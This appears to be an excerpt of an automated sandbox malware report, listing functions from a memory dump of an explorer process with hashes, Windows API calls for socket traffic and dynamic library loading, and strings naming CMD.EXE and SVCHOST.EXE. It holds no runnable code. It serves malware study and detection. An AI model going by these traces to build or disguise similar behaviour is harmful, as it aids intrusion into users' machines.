                                                                            • Opcode Fuzzy Hash: ebb3c86145ac574251e1cd260c97c5d9e44848db4e64dd633c1b28d872071a6e
                                                                            • Instruction Fuzzy Hash: 2521BE36218AC086EB70DB26E49876AB3A1F7C4755F604725E59E877A8DF3CC549CB00
                                                                            APIs
                                                                            • GetStartupInfoW.KERNEL32 ref: 00C0F289
                                                                              • Part of subcall function 00C1061C: Sleep.KERNEL32(?,?,00000000,00C0AC17,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C10661
                                                                            • GetFileType.KERNEL32 ref: 00C0F3F4
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00C0F432
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                            • String ID:
                                                                            • API String ID: 3473179607-0
                                                                            • Opcode ID: a00637d672def6d122fb50bd6454bd482480a36c2ec44e850849cd03ac59f6d6
                                                                            • Instruction ID: 7af91991041d3da56048495e055d8e90afe92f1b3641367aafbd26a25159f4e9
                                                                            • Opcode Fuzzy Hash: a00637d672def6d122fb50bd6454bd482480a36c2ec44e850849cd03ac59f6d6
                                                                            • Instruction Fuzzy Hash: EB81BE72305B8586EB248F25E49472A7760F745B78F588339CA7A437E5EB38C99AC300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 2857295742-2564639436
                                                                            • Opcode ID: 5ea8502d127409c30e8f0cea037d491faaf09cef2e6c29c55e03e349b4fcb175
                                                                            • Instruction ID: 1d117e47220fa809f9264895c7928abffe3975bd864bc8743443f06f76dcc330
                                                                            • Opcode Fuzzy Hash: 5ea8502d127409c30e8f0cea037d491faaf09cef2e6c29c55e03e349b4fcb175
                                                                            • Instruction Fuzzy Hash: EA71C922305E4481EF74CB05E4E973AA3A1FBE8B05F551626A68E877B4EF3CC659C704
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C04210
                                                                            • htons.WS2_32 ref: 00C0423D
                                                                              • Part of subcall function 00C04620: WSACreateEvent.WS2_32 ref: 00C04638
                                                                              • Part of subcall function 00C04620: WSAEventSelect.WS2_32 ref: 00C0465F
                                                                              • Part of subcall function 00C04620: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046B4
                                                                              • Part of subcall function 00C04620: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0442A), ref: 00C046C3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04290
                                                                              • Part of subcall function 00C033B0: send.WS2_32 ref: 00C033DC
                                                                              • Part of subcall function 00C04500: WSACreateEvent.WS2_32 ref: 00C04518
                                                                              • Part of subcall function 00C04500: WSAEventSelect.WS2_32 ref: 00C0453F
                                                                              • Part of subcall function 00C04500: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C04594
                                                                              • Part of subcall function 00C04500: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C04470), ref: 00C045A3
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C042D5
                                                                              • Part of subcall function 00C03370: recv.WS2_32 ref: 00C0339C
                                                                            • und_memcpy.LIBCMTD ref: 00C04313
                                                                            • LocalFree.KERNEL32 ref: 00C0431D
                                                                            • LocalFree.KERNEL32 ref: 00C0432C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 2815282806-0
                                                                            • Opcode ID: 2359b2d6565aaa4b204a568f32a6c0dcb9d4575f061479a5979857e6b9d1f1f7
                                                                            • Instruction ID: 326c29f6303e6fc01a4af67c1c1f8222cc841b2b305dd58c7d391804ce4f6d12
                                                                            • Opcode Fuzzy Hash: 2359b2d6565aaa4b204a568f32a6c0dcb9d4575f061479a5979857e6b9d1f1f7
                                                                            • Instruction Fuzzy Hash: 8041C476618A8486CB54DB1AE49161EBBB0F7CAB90F605116FF8D43B68CB3EC945CF00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __doserrno_close_nolock_errno
                                                                            • String ID:
                                                                            • API String ID: 186997739-0
                                                                            • Opcode ID: 3a164365ed6fe073fd96fd06b95ea34268e68433a44d5ad6ee624808fdf896cc
                                                                            • Instruction ID: b4e85658927d8d76b3bae95b8eb5e014cdfa90da59ff5971ab90503cc760e421
                                                                            • Opcode Fuzzy Hash: 3a164365ed6fe073fd96fd06b95ea34268e68433a44d5ad6ee624808fdf896cc
                                                                            • Instruction Fuzzy Hash: FB110D327007C485D3056F25DC8575D6A10A782775FA64624E639073E7CF7CC9C2E315
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 419579968f7a26765f9e3bd4c3083404088b25ce3d706b4e9fed65b2504746c1
                                                                            • Instruction ID: 9c550ab40709783908fb054b4e3683cd92da4ab1901cd42a4c0d00c0674f4fa8
                                                                            • Opcode Fuzzy Hash: 419579968f7a26765f9e3bd4c3083404088b25ce3d706b4e9fed65b2504746c1
                                                                            • Instruction Fuzzy Hash: 66219636618A8487E710DF55F46472AB7B4F3C5BA4F204615EBA943BA8DF7DC849CB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 8e99e4d5ebc970ea99c1b4cc043f3387283bc053afeb868c42a72b48d6d4cbb0
                                                                            • Instruction ID: 7a1747a0a714f49aac30a48a91d54821e0bf96513f9b16f7e9ee6dd99da8a36b
                                                                            • Opcode Fuzzy Hash: 8e99e4d5ebc970ea99c1b4cc043f3387283bc053afeb868c42a72b48d6d4cbb0
                                                                            • Instruction Fuzzy Hash: 9121C576218A4487E710DB15F45475AB7B0F3CA7A4F204215EB9943BA8DF7DC949CB00
                                                                            APIs
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BF2253
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BF2295
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Directory$SystemWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE
                                                                            • API String ID: 3092845267-3707798339
                                                                            • Opcode ID: cbde160e3633601e06a282f983d34d04294b31e50943011d2a850624e003afad
                                                                            • Instruction ID: 689fd128117ab344db26319169fe054f191ca1e7703b37bdb7725b321371197e
                                                                            • Opcode Fuzzy Hash: cbde160e3633601e06a282f983d34d04294b31e50943011d2a850624e003afad
                                                                            • Instruction Fuzzy Hash: C11133B1618685C7EB14DB51E8907AF73A0F7C2784F604166FB8647AA8CF7CC889CB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                                                                            • API String ID: 667068680-1459209654
                                                                            • Opcode ID: c49bb1680fc37cf61b2d4e13cc9f2760060c892c941fe8037a720ad3c4a5f063
                                                                            • Instruction ID: 5815ee77cdbda207cd570683f1e937838250de937696467ea24d52ff697a2130
                                                                            • Opcode Fuzzy Hash: c49bb1680fc37cf61b2d4e13cc9f2760060c892c941fe8037a720ad3c4a5f063
                                                                            • Instruction Fuzzy Hash: 2CF0B235619F4881F7219B05F898BA933E1F789B54F488726C98D822B5EF7CC69DC601
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F18D
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F1E4
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F21F
                                                                            • free.LIBCMT ref: 00C0F22C
                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F237
                                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00C09870), ref: 00C0F245
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                                                                            • String ID:
                                                                            • API String ID: 517548149-0
                                                                            • Opcode ID: 8b0577917117d9606411091278825d6838e1e9b7f4213f38495a6774c307670f
                                                                            • Instruction ID: 28e53447a77354cec7b8d51c7fe2f671607bb3ed5bbec6feeb3dcacbff32ebdd
                                                                            • Opcode Fuzzy Hash: 8b0577917117d9606411091278825d6838e1e9b7f4213f38495a6774c307670f
                                                                            • Instruction Fuzzy Hash: FC21C532609B80C6EB24DF62B44076D77A4F789FC0F484128DE8A07B98DF78D592C704
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0ABEE
                                                                            • FlsGetValue.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0ABFC
                                                                            • SetLastError.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0AC54
                                                                              • Part of subcall function 00C1061C: Sleep.KERNEL32(?,?,00000000,00C0AC17,?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C10661
                                                                            • FlsSetValue.KERNEL32(?,?,00000000,00C0AC73,?,?,?,00C09403,?,?,00000000,00C09C5B), ref: 00C0AC28
                                                                            • free.LIBCMT ref: 00C0AC4B
                                                                              • Part of subcall function 00C0AB2C: _lock.LIBCMT ref: 00C0AB80
                                                                              • Part of subcall function 00C0AB2C: _lock.LIBCMT ref: 00C0AB9F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C0AC3C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                            • String ID:
                                                                            • API String ID: 3106088686-0
                                                                            • Opcode ID: ddd8e8152c1decaf048e94677246e978b5dd2936f37d9d65b913e9f69b8ce697
                                                                            • Instruction ID: caa3be3368085506202ab8d71f6877198ef2ed04c791af25e317b6b3d4b73af4
                                                                            • Opcode Fuzzy Hash: ddd8e8152c1decaf048e94677246e978b5dd2936f37d9d65b913e9f69b8ce697
                                                                            • Instruction Fuzzy Hash: 35018635205B4187FB05AF75E45476832A1BB89BA1F184734DD2A073D6EE3CC889D211
                                                                            APIs
                                                                            • _getptd.LIBCMT ref: 00C0B88D
                                                                              • Part of subcall function 00C0AC68: _amsg_exit.LIBCMT ref: 00C0AC7E
                                                                            • _getptd.LIBCMT ref: 00C0B8AB
                                                                            • _CallSETranslator.LIBCMT ref: 00C0B8F3
                                                                              • Part of subcall function 00C08788: _getptd.LIBCMT ref: 00C087AF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$CallTranslator_amsg_exit
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 1374396951-2084237596
                                                                            • Opcode ID: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                            • Instruction ID: fe8ae2b71dc0c712fc749b28cb3ed1e5bd0de597a671619d0c653ebea3823946
                                                                            • Opcode Fuzzy Hash: a0a0505cb22886c3b0ba542797d601f8fd46d35cc16e9fcaff9154a5669b2d24
                                                                            • Instruction Fuzzy Hash: 0151DF72304AC5C6CF20DF15E4803ADB360FB81B88F498526EB9E47698DF78C656D700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                                                                            • String ID: d
                                                                            • API String ID: 1024630845-2564639436
                                                                            • Opcode ID: 0c8d4fe7f771d713f549316c6493adff74efcb2e32eb21002f5c97629101f9fd
                                                                            • Instruction ID: 46393e030a704d0f7d8014aa9d6571ef32dadfccd3051c769505cdbdda8eb02b
                                                                            • Opcode Fuzzy Hash: 0c8d4fe7f771d713f549316c6493adff74efcb2e32eb21002f5c97629101f9fd
                                                                            • Instruction Fuzzy Hash: 3D51D922309E8581EE78CB44F4E57B6A3A0FBE5701F521636D58E87BA4EF3CC1958744
APIs
Strings
Yara matches
Similarity
• API ID: CloseHandle$EventFreeObjectSingleVirtualWait
• String ID: d
• API String ID: 971639600-2564639436
• Opcode ID: a81ead949b251b95a200569ce07e686ebe85f193bfe0fa578606f5f15f53c14d
• Instruction ID: 361f6159cb86bfd0c725dc47245e98e424604649bb1e3ffd961b6f0445bb415b
• Opcode Fuzzy Hash: a81ead949b251b95a200569ce07e686ebe85f193bfe0fa578606f5f15f53c14d
• Instruction Fuzzy Hash: C251DA62309E8481EE78CB45F4E97B663A0FBE5B01F421636D58E87BB4EF3CC1958644
APIs
Strings
Yara matches
Similarity
• API ID: CloseHandle$EventFreeObjectSingleVirtualWait
• String ID: d
• API String ID: 971639600-2564639436
• Opcode ID: 8915914118a8f83e044ffa17093a488dd77adb64864bea4865eaae2b93a57a35
• Instruction ID: f446cc9fef69829b6618e4a517da2ec9c75a498ac5504f2a463623196c8c62e3
• Opcode Fuzzy Hash: 8915914118a8f83e044ffa17093a488dd77adb64864bea4865eaae2b93a57a35
• Instruction Fuzzy Hash: 4741B962305E0481EF78CB45F4E9775A3A0FBE8B05F421726A54E877B4EE3CD6558704
APIs
Strings
Yara matches
Similarity
• API ID: _getptd$ExceptionRaise_amsg_exit
• String ID: csm
• API String ID: 4155239085-1018135373
• Opcode ID: 5308a84c5b480e16c2d7e933af38e05b88746f3fed8382a7f48b0a7da0dc917f
• Instruction ID: ecc6312f4cbb79f791579e3d3feed6ba683c27ba47984c488040c99e03b27622
• Opcode Fuzzy Hash: 5308a84c5b480e16c2d7e933af38e05b88746f3fed8382a7f48b0a7da0dc917f
• Instruction Fuzzy Hash: 65212B36204681C7D630DF52E04076EB364F789BA5F454226DFAA03B95CF39EA8ADB11
APIs
Strings
Yara matches
Similarity
• API ID: AddressLibraryLoadProcVersion
• String ID: NTDLL.DLL$RtlGetVersion
• API String ID: 2685220120-196638859
• Opcode ID: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
• Instruction ID: 86eeaf7c4ea7770c667342f1711c154b9856aaaed803c4c074f2a549a8480a48
• Opcode Fuzzy Hash: 42daa815b2a7eb0b21278584d862c4cfba6597e56c53cd9aa9c348133628d252
• Instruction Fuzzy Hash: 5C11E936228B84C6E764DF14F8447AAB3A0F3C9754F404625AA8E477A8DF7CC649CF40
APIs
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00BE108D), ref: 00BE5A7B
• GetProcAddress.KERNEL32 ref: 00BE5A9A
• FreeLibrary.KERNEL32 ref: 00BE5ABA
Strings
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SetProcessDPIAware$USER32.DLL
• API String ID: 145871493-772676101
• Opcode ID: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
• Instruction ID: 264a333698bf16e7d1b35ad2874d1d9b83a05bd7e2770fa8497f302bee329b01
• Opcode Fuzzy Hash: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
• Instruction Fuzzy Hash: A7F09276518A8482E730EB14F88879977B0F789798F441725E68E42669DF7CC69CCB04
APIs
• _fileno.LIBCMT ref: 00C09951
  • Part of subcall function 00C1033C: _errno.LIBCMT ref: 00C10345
